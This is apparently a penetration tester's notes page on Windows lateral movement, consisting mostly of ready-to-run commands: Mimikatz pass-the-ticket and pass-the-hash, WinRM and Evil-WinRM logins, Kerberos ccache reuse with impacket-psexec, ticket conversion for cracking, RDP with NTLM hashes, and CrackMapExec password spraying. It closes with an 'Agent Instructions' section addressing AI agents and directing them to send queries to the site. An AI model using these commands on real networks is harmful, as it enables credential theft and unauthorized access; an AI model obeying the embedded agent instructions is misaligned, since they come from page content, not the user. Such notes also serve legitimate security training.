# Lateral Movement

There aren't many ways to move laterally on windows. Below are the main ones.

* psexec
* RDP
* WinRM
* SSH(not likely)

PTH(pass the hash) can be used most of the time. 

## Mimikatz Ticket PTT

```py
Enable-PSRemoting
mimikatz.exe '" kerberos:ptt C:\Users\Public\ticketname.kirbi"' "exit"
Enter-PSSession -ComputerName ECORP
```

## WinRM

```powershell
$pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('ECORP.local\morph3', $pass)
Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }

# Evil-WinRM
https://github.com/Hackplayers/evil-winrm
ruby evil-winrm.rb -i 192.168.1.2 -u morph3 -p morph3 -r evil.corp
```

## PTH with Mimikatz

```powershell
Invoke-Mimikatz -Command '"sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:command"'
```

## Pass The Ccache (PTC)

Grab the ccache from remote and put into environment variable

```
export KRB5CCNAME=/home/morph3/Desktop/krb5cc_012345678_XXXX
```

Make sure the times are synced up with the DC 

```
sudo ntpdate -u 192.168.1.231
```

Psexec to the target

```
impacket-psexec morph3@dc01.domain.local -dc-ip 192.168.1.231 -k -no-pass
```

\*\* Don't include domain name in psexec. If you are having issues with the command you may remove the username as well.

## Cracking Ccache

Convert the ccache file into kirbi file using a converter. 

* I use <https://github.com/zer1t0/ticket_converter>

```
python2 /opt/ticket_converter/ticket_converter.py krb5cc_012345678_XXXX ticket.kirbi
```

Convert kirbi to crackable hash.

* <https://github.com/nidem/kerberoast>
* <https://github.com/jarilaos/kirbi2hashcat/blob/master/kirbi2hashcat.py>

```
python3 /opt/kerberoast/kirbi2john.py ticket.kirbi | tee ticket_hash.txt
```

## RDP

Impacket's rdp\_check.py script is good.

```
impacket-rdp_check morph3:Password123@1.3.3.7
python3 /opt/impacket/examples/rdp_check.py ecorp/morph3@1.3.3.7
```

```
xfreerdp /u:morph3 /p:Password123 /v:1.3.3.7
xfreerdp /u:morph3  /pth:08df3c74ded740e1f2bcf5dea4b8daf6  /v:1.3.3.7
rdesktop 1.3.3.7 -u Administrator -p 123456
```

## CrackMapExec

Swiss-knife tool for password spraying.

* <https://github.com/byt3bl33d3r/CrackMapExec>

```
crackmapexec smb ./ips.txt -u ./users -H hashes --local-auth
crackmapexec smb 1.3.3.7  -u ./users -p ./passwords --continue-on-success --shares
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.morph3.blog/windows/lateral-movement.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.